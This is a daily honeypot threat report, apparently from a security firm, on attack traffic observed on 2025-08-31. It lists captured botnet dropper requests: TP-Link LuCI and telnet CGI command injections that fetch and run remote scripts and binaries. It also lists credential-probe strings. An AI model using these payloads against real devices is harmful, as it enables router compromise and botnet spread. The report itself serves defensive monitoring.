Skip to main content
  1. Daily-Posts/

Report: 2025-08-31

·304 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-08-31
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 7 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 10 new requests that have never been observed before (these were added to the monitored request database.).

A total of 450 requests were recorded during the day, originating from 7 different countries, with a peak of 104 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USGermany
USGermany

botnet_dropper_behaviour
#

remote_addrrequest
61.80.239.193GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1
58.40.8.206GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1
207.189.221.46GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
221.159.119.6GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1
139.216.137.182GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
121.167.125.180GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1
91.224.92.22GET /cgi-bin/shortcut_telnet.cgi?cd%20/var/tmp;rm%20-rf%20arm7;wget%20http://91.224.92.22:58485/observatory/arm7;chmod%20777%20*;./arm7%20fibn HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
95CONNECT 196.251.87.42:80 HTTP/1.0
642GET /orvzjhhwrr/rh86fmvgaj/41042 HTTP/1.1
881GET /portal/loginpage.aspx HTTP/1.1
1021\x00\x0E8\xCF
1171\x00\x0E8\x97\x89(Z\xBC\xEA\x84(\x00\x00\x00\x00\x00
1211\x04\x01\x00P\xC4\xFBW*\x00
1231\x04\x01\x00P\xC4\xFBW*ubnt:ubnt\x00
1261\x04\x01\x00P\xC4\xFBW*support:support\x00
1271\x04\x01\x00P\xC4\xFBW*oracle:oracle\x00
1281\x04\x01\x00P\xC4\xFBW*cisco:cisco\x00

country_iso_code
#

number_of_occurencecountry_iso_code
0104US
164GB
246ID
346KZ
439SC
525DE
624NL
724CA
811KR
911SG
1010CN
119CH
126AU
134JP
144UA
153BG
163FR
173BE
183IT
192RU
202BR
211MN
221PT
231MC
241AM
251TW
261IN
271HK

Related

Report: 2025-08-30
·331 words
Repport Daily
Report: 2025-08-29
·440 words
Repport Daily
Report: 2025-08-28
·329 words
Repport Daily